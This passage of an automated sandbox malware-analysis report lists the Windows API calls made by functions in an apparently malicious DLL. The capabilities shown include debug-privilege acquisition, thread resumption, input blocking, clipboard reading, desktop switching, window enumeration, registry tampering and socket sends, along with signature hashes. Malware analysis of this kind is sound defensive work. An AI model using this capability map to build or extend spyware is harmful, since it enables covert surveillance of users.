                                                  • Favorites, xrefs: 1002AE4D
                                                  • P, xrefs: 1002AE18
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 1002AE28
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocLocallstrcat$CloseFileFindFirstOpenQueryValue
                                                  • String ID: Favorites$P$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 3779601296-2418616894
                                                  • Opcode ID: a8d8ff9fcbd12a0f3c28fe7179bea7efc04e8266e358b229fc4b4cde101c045e
                                                  • Instruction ID: 42e8c65be68f3a94c8a2d09bd038b3f1d25a706c740ab1906cecab214c4d0d89
                                                  • Opcode Fuzzy Hash: a8d8ff9fcbd12a0f3c28fe7179bea7efc04e8266e358b229fc4b4cde101c045e
                                                  • Instruction Fuzzy Hash: E311C1B4208301FFE300DF14CC86F9A77A5FB88304F508E1DF648A26A1D7B894488B66
                                                  APIs
                                                    • Part of subcall function 100290C0: GetCurrentProcess.KERNEL32(00000028), ref: 100290D0
                                                    • Part of subcall function 100290C0: OpenProcessToken.ADVAPI32(00000000), ref: 100290D7
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 10029177
                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 10029184
                                                  • Thread32Next.KERNEL32(00000000,0000001C), ref: 1002919F
                                                  • OpenThread.KERNEL32(001F03FF,00000000,?,00000004,00000000), ref: 100291B2
                                                  • ResumeThread.KERNEL32(00000000), ref: 100291BB
                                                  • CloseHandle.KERNEL32(00000000), ref: 100291C2
                                                  • CloseHandle.KERNEL32(00000000,00000004,00000000), ref: 100291C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcessThreadThread32$CreateCurrentFirstNextResumeSnapshotTokenToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2312015761-2896544425
                                                  • Opcode ID: 92575825664269da82754a126b87f41c0fa238dd4cdd121b5c861b03491c7cf0
                                                  • Instruction ID: 5baa37ad70a989ad156aa77d6f180d112f87292081aecf7063da644eb0796895
                                                  • Opcode Fuzzy Hash: 92575825664269da82754a126b87f41c0fa238dd4cdd121b5c861b03491c7cf0
                                                  • Instruction Fuzzy Hash: 9501A935244204BFF200EBA99C86FAF77A8FF85B90F844519FA0486281D671AD058BB7
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(dwmapi.dll,10098B10,1001767F), ref: 10017486
                                                  • GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 1001749F
                                                  • GetProcAddress.KERNEL32(00000000,DwmEnableComposition), ref: 100174AB
                                                    • Part of subcall function 10017460: #102.DWMAPI(00000000,100174B6), ref: 1001746B
                                                  • FreeLibrary.KERNEL32(00000000), ref: 100174B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryProc$#102FreeLoad
                                                  • String ID: DwmEnableComposition$DwmIsCompositionEnabled$dwmapi.dll$Wu
                                                  • API String ID: 921056788-1252603044
                                                  • Opcode ID: e7bc18532d82db7781f6db1b43c4f4c4d0ba297617c9142dcf3622deb4fcc179
                                                  • Instruction ID: ec8973c85b4295611fe6e660086daf7ad590bfada4181087f49f392a1ed51eb0
                                                  • Opcode Fuzzy Hash: e7bc18532d82db7781f6db1b43c4f4c4d0ba297617c9142dcf3622deb4fcc179
                                                  • Instruction Fuzzy Hash: 29E0123A502D3A679251F72D5C14DCF2AA8FF867E13464251FD08F6114DB24DD4289B6
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 10015221
                                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000,?,00000000,000F003F,?), ref: 10015257
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,00000000,000F003F,?), ref: 100152AB
                                                  • malloc.MSVCRT ref: 100152EC
                                                  • malloc.MSVCRT ref: 100152F7
                                                  • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,?), ref: 10015381
                                                  • free.MSVCRT ref: 10015418
                                                  • free.MSVCRT ref: 1001541F
                                                  • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 10015428
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocLocalfreemalloc$EnumInfoOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 1291067549-0
                                                  • Opcode ID: 70730c2a36e0dd9a8ee3e77033d8e79970e5c7148256659a69bce964993824cd
                                                  • Instruction ID: 5915bfdc95f607c6d5eb67979cc6f14533ef2d4ee1d7cd6938408f8d64ec304b
                                                  • Opcode Fuzzy Hash: 70730c2a36e0dd9a8ee3e77033d8e79970e5c7148256659a69bce964993824cd
                                                  • Instruction Fuzzy Hash: 6471D1716083059FD718CF28C880B6BBBE9FBC8745F484A1DF9869B350DA71EA44CB52
                                                  APIs
                                                  • CreateRectRgnIndirect.GDI32(?), ref: 10018486
                                                  • GetRegionData.GDI32(00000000,00000000,00000000), ref: 1001851A
                                                  • #823.MFC42(00000000,?,?,?,?,?,?,00000001,?,?,?), ref: 1001851F
                                                  • GetRegionData.GDI32(00000000,00000000,00000000), ref: 10018530
                                                  • DeleteObject.GDI32(?), ref: 10018537
                                                  • #825.MFC42(00000000,00000000,00000000,?,?,00000001,?,?,?,?,?,?,?,?,?,10016B8A), ref: 10018547
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DataRegion$#823#825CreateDeleteIndirectObjectRect
                                                  • String ID:
                                                  • API String ID: 643377033-0
                                                  • Opcode ID: 001346d870f36c53a5a7599e2016c51c9870b5627219f4efa7edda646e5686e0
                                                  • Instruction ID: 3140f93dabf97cb7bd3e409eff6f417ecd497d9d1c0577791c74c40de05a7771
                                                  • Opcode Fuzzy Hash: 001346d870f36c53a5a7599e2016c51c9870b5627219f4efa7edda646e5686e0
                                                  • Instruction Fuzzy Hash: F85181B56087028BD314DF29D880A5BB7E6FFC8710F15492DF48ACB311EB74EA458B56
                                                  APIs
                                                  • GetWindowTextA.USER32(?,?,000003FF), ref: 10029EA4
                                                  • IsWindowVisible.USER32 ref: 10029EB3
                                                  • lstrlenA.KERNEL32(?), ref: 10029ECC
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 10029EDF
                                                  • LocalSize.KERNEL32 ref: 10029EEF
                                                  • lstrlenA.KERNEL32(?), ref: 10029F0D
                                                  • LocalReAlloc.KERNEL32(?,?,00000042), ref: 10029F19
                                                  • GetWindowThreadProcessId.USER32(?), ref: 10029F26
                                                  • lstrlenA.KERNEL32(?,?,?,?,00000042), ref: 10029F34
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalWindowlstrlen$Alloc$ProcessSizeTextThreadVisible
                                                  • String ID:
                                                  • API String ID: 925664022-0
                                                  • Opcode ID: bdfcf0507623c4ea93ccd5645be1c1770e5c62d3ec9ad61f7fed79ab38ba254a
                                                  • Instruction ID: add1fb3533e99334b1788f801bc1a9e543b8ff74f7df4c1f04976087df14b6d6
                                                  • Opcode Fuzzy Hash: bdfcf0507623c4ea93ccd5645be1c1770e5c62d3ec9ad61f7fed79ab38ba254a
                                                  • Instruction Fuzzy Hash: 2621027A2003469BE750DF24CC84BEB77A8FB84750F84452DFE49A3240DA35A80AC771
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 1001656D
                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 10016578
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 10016589
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 10016594
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 100165A3
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 100165AC
                                                  • ReleaseDC.USER32(00000000,?), ref: 100165B7
                                                    • Part of subcall function 100167E0: sprintf.MSVCRT ref: 1001682F
                                                    • Part of subcall function 100167E0: RegOpenKeyExA.ADVAPI32(?,?,00000000,00000002,?), ref: 1001686F
                                                    • Part of subcall function 100167E0: RegSetValueExA.ADVAPI32(?,SuppressDisableCompositionUI,00000000,00000004,?,00000004), ref: 1001688E
                                                    • Part of subcall function 100167E0: RegCloseKey.ADVAPI32(?), ref: 1001689D
                                                  • BlockInput.USER32(00000000,?,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 100165CD
                                                  • DestroyCursor.USER32(00000000), ref: 1001660A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close$ExchangeHandleInterlockedObjectSingleWait$BlockCursorDestroyInputOpenReleaseValuesprintf
                                                  • String ID:
                                                  • API String ID: 1142494416-0
                                                  • Opcode ID: 4ceefefdeb35724f5cd5cb8af09bc795719a28882878dd3cc17cf0b47423efc6
                                                  • Instruction ID: d4b191a7be4f08d6e559449bda8c86e8365c3d0bd4d75666bcc753f4c4a699e3
                                                  • Opcode Fuzzy Hash: 4ceefefdeb35724f5cd5cb8af09bc795719a28882878dd3cc17cf0b47423efc6
                                                  • Instruction Fuzzy Hash: 00212C752407049BE614DB64CC81BD6B3E8FF88720F154A1DF26A972D0CBB5B901CB91
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 1002C5E2
                                                  • GetThreadDesktop.USER32(00000000), ref: 1002C5E9
                                                  • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C61C
                                                  • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 1002C627
                                                  • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C64E
                                                  • lstrcmpiA.KERNEL32(?,?), ref: 1002C65D
                                                  • SetThreadDesktop.USER32(00000000), ref: 1002C668
                                                  • CloseDesktop.USER32(00000000), ref: 1002C680
                                                  • CloseDesktop.USER32(00000000), ref: 1002C683
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                                                  • String ID:
                                                  • API String ID: 3718465862-0
                                                  • Opcode ID: 346a97fe3b554d6ea7b4bbaf12baa1f8d932fbe5d70e927d73db7af9313f27ee
                                                  • Instruction ID: 7203b97fb3658a15e50f8a55408f95546fea7e3c6eec87968affc7e345bb74f4
                                                  • Opcode Fuzzy Hash: 346a97fe3b554d6ea7b4bbaf12baa1f8d932fbe5d70e927d73db7af9313f27ee
                                                  • Instruction Fuzzy Hash: B811EB751043196BF310DF68DC4AFDB77D8FB84700F010D19F64592191EBB4A549C7A6
                                                  APIs
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F11
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F1F
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F2C
                                                  • #541.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F39
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F46
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F53
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F60
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F6D
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F90
                                                    • Part of subcall function 100110D0: #2614.MFC42(00000000,?), ref: 100110F5
                                                    • Part of subcall function 100110D0: #2614.MFC42(00000000,?), ref: 100110FD
                                                    • Part of subcall function 100110D0: #6143.MFC42(00000000,000000FF,00000000,?), ref: 10011110
                                                    • Part of subcall function 100110D0: #2614.MFC42(00000000,000000FF,00000000,?), ref: 1001111C
                                                    • Part of subcall function 100110D0: #860.MFC42(?,00000000,000000FF,00000000,000000FF,00000000,?), ref: 10011137
                                                    • Part of subcall function 100110D0: PathGetArgsA.SHLWAPI(00000000,?), ref: 10011172
                                                    • Part of subcall function 100110D0: #860.MFC42(00000000), ref: 1001117C
                                                    • Part of subcall function 100110D0: PathRemoveArgsA.SHLWAPI(00000000), ref: 10011186
                                                    • Part of subcall function 100110D0: PathUnquoteSpacesA.SHLWAPI(00000000,?), ref: 10011191
                                                    • Part of subcall function 100110D0: _splitpath.MSVCRT ref: 100111C5
                                                    • Part of subcall function 100110D0: #860.MFC42(?,?,?,?,?), ref: 100111D6
                                                    • Part of subcall function 100110D0: #860.MFC42(?,?,?,?,?,?), ref: 100111E8
                                                    • Part of subcall function 100110D0: #6876.MFC42(0000002F,0000005C,?,?,?,?,?,?), ref: 100111F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #540$#860$#2614Path$Args$#541#6143#6876RemoveSpacesUnquote_splitpath
                                                  • String ID:
                                                  • API String ID: 882339912-0
                                                  • Opcode ID: bcae64db62a9173b5de6d8cd2ae765ea97d72524f73a260d54af00dd520cab45
                                                  • Instruction ID: b1f006ec1c09e58242ba318f60969b2c11d84897468487acfae0c13bde89da3f
                                                  • Opcode Fuzzy Hash: bcae64db62a9173b5de6d8cd2ae765ea97d72524f73a260d54af00dd520cab45
                                                  • Instruction Fuzzy Hash: DB213B780057818ED354CF59D642B6AFBE4FF94B10F40491DE4DA83682DB74B508CBB2
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 10017C2A
                                                  • GetClipboardData.USER32(00000001), ref: 10017C36
                                                  • CloseClipboard.USER32 ref: 10017C46
                                                  • GlobalSize.KERNEL32(00000000), ref: 10017C55
                                                  • GlobalLock.KERNEL32(00000000), ref: 10017C5F
                                                  • #823.MFC42(00000001), ref: 10017C68
                                                  • GlobalUnlock.KERNEL32(?), ref: 10017C8F
                                                  • CloseClipboard.USER32 ref: 10017C95
                                                  • #825.MFC42(00000000), ref: 10017CA7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$Close$#823#825DataLockOpenSizeUnlock
                                                  • String ID:
                                                  • API String ID: 15072309-0
                                                  • Opcode ID: e4c83fdc53078b23110fe99408f6848a6625d633b3bafd07e91433b67cd46e05
                                                  • Instruction ID: 9d338dc67493be82bb18043d65382f3dd730fbe0f51d25364675624cb99999ab
                                                  • Opcode Fuzzy Hash: e4c83fdc53078b23110fe99408f6848a6625d633b3bafd07e91433b67cd46e05
                                                  • Instruction Fuzzy Hash: E001D6395046246FE710EB649C89ADB37A8FF44651F490228FD0ED7250EB75E904C6F2
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 10016F1A
                                                  • GetClipboardData.USER32(00000001), ref: 10016F26
                                                  • CloseClipboard.USER32 ref: 10016F36
                                                  • GlobalSize.KERNEL32(00000000), ref: 10016F45
                                                  • GlobalLock.KERNEL32(00000000), ref: 10016F4F
                                                  • #823.MFC42(00000001), ref: 10016F58
                                                  • GlobalUnlock.KERNEL32(?), ref: 10016F7F
                                                  • CloseClipboard.USER32 ref: 10016F85
                                                  • #825.MFC42(00000000), ref: 10016F97
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$Close$#823#825DataLockOpenSizeUnlock
                                                  • String ID:
                                                  • API String ID: 15072309-0
                                                  • Opcode ID: 4072f59da86136a8181d21f34bb8e7e131716998d916dfe5853bc9eb5e6c99c2
                                                  • Instruction ID: 7427716a2ac4119ad4da49d555f0140185f668cd49e7d982ef33821d485bf08e
                                                  • Opcode Fuzzy Hash: 4072f59da86136a8181d21f34bb8e7e131716998d916dfe5853bc9eb5e6c99c2
                                                  • Instruction Fuzzy Hash: 2401DB395042246FE710EB64AC89AEB3798FF44701F484229FD0ED7200EB759904C6F1
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(1012C4C8), ref: 10022E6A
                                                  • LeaveCriticalSection.KERNEL32(1012C4C8), ref: 10022E82
                                                    • Part of subcall function 10022D10: _strnicmp.MSVCRT ref: 10022D24
                                                  • send.WS2_32(?,HTTP/1.0 200 OK,?,00000000), ref: 10022F1E
                                                  • send.WS2_32(?,?,00000000,00000000), ref: 10022F94
                                                  • CreateThread.KERNEL32(00000000,00000000,10023F60,?,00000000,?), ref: 10022FBC
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00000000), ref: 10022FC9
